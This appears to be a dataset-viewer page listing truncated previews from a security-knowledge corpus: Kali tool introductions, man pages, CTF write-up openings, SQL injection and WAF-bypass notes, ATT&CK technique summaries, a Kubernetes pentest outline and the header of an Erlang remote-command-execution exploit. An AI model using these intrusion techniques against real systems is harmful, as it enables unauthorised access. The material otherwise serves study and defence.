mx=len(a[num])
for i in range(mx):
for ... | sec-knowleage |
---
title: Arduino
categories: Hardware Hacking
tags: [Arduino,Hardware Hacking,kali linux]
date: 2019-06-25 11:16:00
---
0x00 Arduino介绍
-------------
Arduino是一个基于适应性强,用法简便的软件和硬件平台的开源电子开发平台。它主要面向艺术家,设计师,爱好者以及其他所有对创造交互式项目以及环境有兴趣的人。
原项目地址: http://www.arduino.cc/
[Arduino主页](http://www.arduino.cc/) | [Kali上的Arduino库](http... | sec-knowleage |
# Exploit Title: Remote Command Execution via Erlang Distribution Protocol
# Date: 2022-01-21
# Exploit Author: Konstantin Burov, @_sadshade
# Software Link: https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html
# Version: N/A
# Tested on: Kali 2021.2
# Based on 1F98D's Erlang Cookie - Remote Code Execution
# Sh... | sec-knowleage |
# Container - Kubernetes Pentest
> Kubernetes commonly stylized as K8s) is an open-source container orchestration system for automating software deployment, scaling, and management.
## Summary
- [Tools](#tools)
- [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp)
- [Obtaining Service Account Token](#obt... | sec-knowleage |
---
title: MySQL
date: 2020-12-16 18:28:43
background: bg-[#2a6387]
tags:
- RDBMS
- DB
categories:
- Database
intro: The SQL cheat sheet provides you with the most commonly used SQL statements for your reference.
plugins:
- tooltip
- copyCode
---
Getting Started {.cols-2}
---------------
### Connec... | sec-knowleage |
compress
===
使用Lempress-Ziv编码压缩数据文件
## 补充说明
**compress命令** 使用“Lempress-Ziv”编码压缩数据文件。compress是个历史悠久的压缩程序,文件经它压缩后,其名称后面会多出".Z"的扩展名。当要解压缩时,可执行uncompress指令。事实上uncompress是指向compress的符号连接,因此不论是压缩或解压缩,都可通过compress指令单独完成。
### 语法
```shell
compress(选项)(参数)
```
### 选项
```shell
-f:不提示用户,强制覆盖掉目标文件;
-c:将结果送到标准输出,无文件被改变;
-r:递归的操作方式;
... | sec-knowleage |
'\"
'\" Copyright (c) 1990 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: destroy.n,v 1.2 2003/11/24 05:09:5... | sec-knowleage |
# T1110-003-windows-密码喷射
## 来自ATT&CK的描述
当密码未知或获得密码哈希值时,攻击者可以使用暴力破解技术尝试访问帐户。
攻击者可能会在操作期间尝试暴力破解登录,这是一个风险较高的选项,因为它可能导致大量身份验证失败记录和帐户锁定,具体取决于组织的登录失败策略。
密码喷射技术是使用一个密码(例如,“Password01”)或一小组密码,其匹配域的复杂性策略并且可以是常用密码。尝试使用该密码的**不同账户**进行登录,从而避免触发组织内的策略导致账户锁定。
通常,在密码喷射时使用常用端口上的管理服务。通用目标服务包括以下内容:
- SSH(22/TCP)
- Telnet(23/TCP)
- FTP(21... | sec-knowleage |
### 栈溢出原理介绍
栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。这种问题是一种特定的缓冲区溢出漏洞,类似的还有堆溢出,bss 段溢出等溢出方式。栈溢出漏洞轻则可以使程序崩溃,重则可以使攻击者控制程序执行流程。此外,我们也不难发现,发生栈溢出的基本前提是
- 程序必须向栈上写入数据。
- 写入的数据大小没有被良好地控制。
### 栈溢出基本示例
最典型的栈溢出利用是覆盖程序的返回地址为攻击者所控制的地址,**当然需要确保这个地址所在的段具有可执行权限**。下面,我们举一个简单的例子:
```C
#include <stdio.h>
#include <str... | sec-knowleage |
# Meow (re/crypto, 174p, 67 solved)
Officially this challenge was marked as `RE`, however we only reversed this as much as to be able to run it, and understand roughly what it might be doing, and then just solved this as blackbox crypto problem.
In the challenge we get [bytecode](meow.n) for NEKO VM and [encrypted flag... | sec-knowleage |
# Writeup Ekoparty CTF 2015
Uczestniczyliśmy (msm, Rev, Shalom, other019, nazywam i pp) w Ekoparty CTF, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy).
Ogólne wrażenia:
Opisy zadań po kolei.
# Spis treści/Table of contents:
* Slogans (trivia 50)
* Banner (trivia 70)
* Mr ... | sec-knowleage |
# Graal (pwn, 477p, 13 solved)
A high level pwnable challenge for which we get [source code](main.clj) in Clojure/LISP.
Interestingly the challenge is very similar to task from Insomnihack few years back, which was written in LISP -> https://github.com/p4-team/ctf/tree/master/2016-03-18-insomnihack-final/misc_robots
Th... | sec-knowleage |
# 枚举Azure
## 常见配置错误
_或者说Microsoft那些默认值带来的安全风险_
默认情况下,Azure对组织中的每个用户开放。这意味着,例如Office 365的客户很可能没有设置条件访问策略来阻止用户登录 [portal.azure.com](http://portal.azure.com/) 并检索每个用户,角色和组。因此他们不这样做,他们就不会清楚地知道用户在那里做什么。但那又为什么要询问域控制器并检测是否可以从Azure获得所需内容?下面列出了一些很有用的Powershell工具。
## 资料、工具、程序
### **一些很有用的文章**
* [https://www.blackhillsinfosec.com... | sec-knowleage |
---
title: cisco-torch
categories: Vulnerability Analysis
tags: [vulnerability analysis,kali linux,exploitation tools,cdpsnarf,information gathering]
date: 2016-10-19 14:11:46
---
0x00 cisco-torch介绍
-------------
Cisco Torch是集大规模扫描,指纹识别和利用工具的下一代“黑掉暴露的思科网络”工具,开发它的原因是上市场上提供的工具不能满足我们的需要。
Cisco-torch与类似工具不同的主要特性是大量启动多个后台扫描... | sec-knowleage |
# T1140-win-去混淆/解码文件或信息
## 来自ATT&CK的描述
攻击者可能会使用混淆文件或信息来隐藏入侵。他们可能需要单独的机制来解码或模糊处理该信息,具体取决于他们打算如何使用它。这样做的方法包括内置恶意软件功能或使用系统上存在的实用程序。
经典的例子就是使用certutil解码已隐藏在证书文件中的远程访问工具,可移植可执行文件。另一个经典的例子是使用Windowscopy /b命令将二进制片段重组为恶意有效负载。
有时,作为用户执行的一部分,可能需要打开用户的操作以对其进行去模糊化或解密操作。可能还要求用户输入密码以打开由攻击者提供的受密码保护的压缩/加密文件。
## 测试案例
Certutil.exe是一个命令行... | sec-knowleage |
# SQL 注入
## 基本概念
- SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。
- 攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。
- 如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。
## 常用工具
- Burp Suite:[Burp Suite 使用介绍](http://drops.xmd5.com/... | sec-knowleage |
du
===
显示每个文件和目录的磁盘使用空间
## 补充说明
**du命令** 也是查看使用空间的,但是与df命令不同的是Linux du命令是对文件和目录磁盘使用的空间的查看,还是和df命令有一些区别的。
### 语法
```shell
du [选项][文件]
```
### 选项
```shell
-a, --all 显示目录中个别文件的大小。
-B, --block-size=大小 使用指定字节数的块
-b, --bytes 显示目录或文件大小时,以byte为单位。
-c, --t... | sec-knowleage |
# Revolutional Secure Angou (crypto, 154p, 82 solved)
In the challenge we get [encrypted flag](flag.encrypted), [public key](publickey.pem) and [challenge source code](generator.rb):
```ruby
require 'openssl'
e = 65537
while true
p = OpenSSL::BN.generate_prime(1024, false)
q = OpenSSL::BN.new(e).mod_inverse(p)
ne... | sec-knowleage |
> The world’s most used penetration testing framework.
>
> Metasploit
从本季开始将会连载 Metasploit 教学,非常荣幸,本部门在我的“怂恿”下,基本以Metasploit 为常用框架做渗透。为了更好的把这个“坏习惯”延续下去,遂打算写一套完整的系列教程。以供同学们在使用中,或者新来的同学形成递归学习或者查询相关资料。在写的同时,查阅了大量的资料以及借鉴了许多思路。感谢为此贡献的老师们。
Metasploit 项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名... | sec-knowleage |
.\" Copyright (c) Bruno Haible <haible@clisp.cons.org>
.\"
.\" This is free documentation; you can redistribute it and/or
.\" modify it under the terms of the GNU General Public License as
.\" published by the Free Software Foundation; either version 2 of
.\" the License, or (at your option) any later version.
.\"
.\" ... | sec-knowleage |
# 基于数据的隐蔽通讯检测
## 0. 研究综述
网络隐蔽信道关键技术研究综述, 李彦峰, 丁丽萍, 吴敬征, 崔强, 刘雪花, 关贝, 王永吉, http://www.jos.org.cn/html/2019/8/5859.htm
### 隐蔽通讯的定义
### 隐蔽通讯的分类
### 隐蔽通讯的构建
### 隐蔽通讯的对抗
## 1. 基于DNS的隐蔽信道检测
### 基于DNS的隐蔽信道构建过程
// TODO
### 对抗思路
这边的对抗思路主要是指在专家经验的情况下,对这种基于DNS的隐蔽信道如何做检测。这边的对抗思路有助于我们转换为基于数据的检测思路。提供安全能力支持和方向指导、启发作用。
// TODO
### 检测思... | sec-knowleage |
# 音频隐写
与音频相关的 CTF 题目主要使用了隐写的策略,主要分为 MP3 隐写,LSB 隐写,波形隐写,频谱隐写等等。
## 常见手段
通过 `binwalk` 以及 `strings` 可以发现的信息不再详述。
## MP3 隐写
### 原理
MP3隐写主要是使用 [Mp3Stego](http://www.petitcolas.net/steganography/mp3stego/) 工具进行隐写,其基本介绍及使用方法如下
> MP3Stego will hide information in MP3 files during the compression process. The data is first comp... | sec-knowleage |
# ∑BIT
Category: Misc., 100 points
## Description
> We hid an email in this challenge, find it to get the flag (and feel free to send your CV to this email 😉).
>
> Note: the flag is cstechnion{sha1(<email>)}
A binary file was attached.
## Solution
Let's check the attached file:
```console
┌──(user@kali)-[/media/sf_CT... | sec-knowleage |
.\" Copyright Andries Brouwer, Ragnar Hojland Espinosa and A. Wik, 1998.
.\" Chinese Version Copyright Scorpio, BitBIRD, www.linuxforum.net, 2000
.\" This file may be copied under the conditions described
.\" in the LDP GENERAL PUBLIC LICENSE, Version 1, September 1998
.\" that should have been distributed together wi... | sec-knowleage |
# 0x00 简介
WAF的绕过我们无非就是利用WEB程序缺陷,容器特性,网络协议,数据库特性来组合利用绕过,从用户发出请求到数据库的每一点,寻找突破口。
# 0x01 常见的手段
1. HTTP协议
2. 大小混写
3. 替换
4. 使用特殊字符
5. 使用编码
6. 等价替换
7. 容器特性
8. 白名单
9. 缓冲溢出
等等
### HTTP协议
HTTP协议中有很多功能,一般来说我们可以用到的就是编码功能,后来有大佬发现了分块传入来绕过WAF,具体大家可以百度看看,大概http协议我们可以总结如下。
1. 构造畸形数据包
2. 编码
3. 分块
4. 数据包溢出
可能有些表述有误,但是大概意思如此,构造畸形数据包的原理是h... | sec-knowleage |
# Improve the quality (Crypto)
In the task we get a [lengthly description](description.txt).
Short version is:
1. We have ECC encryption.
2. The curve is `y^2 = x^3 + 658974*x + B` with most significat decimal digit of `B` being `6`
3. Prime field is based on `p = 962280654317`
4. We get generator point `P = (518459267... | sec-knowleage |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.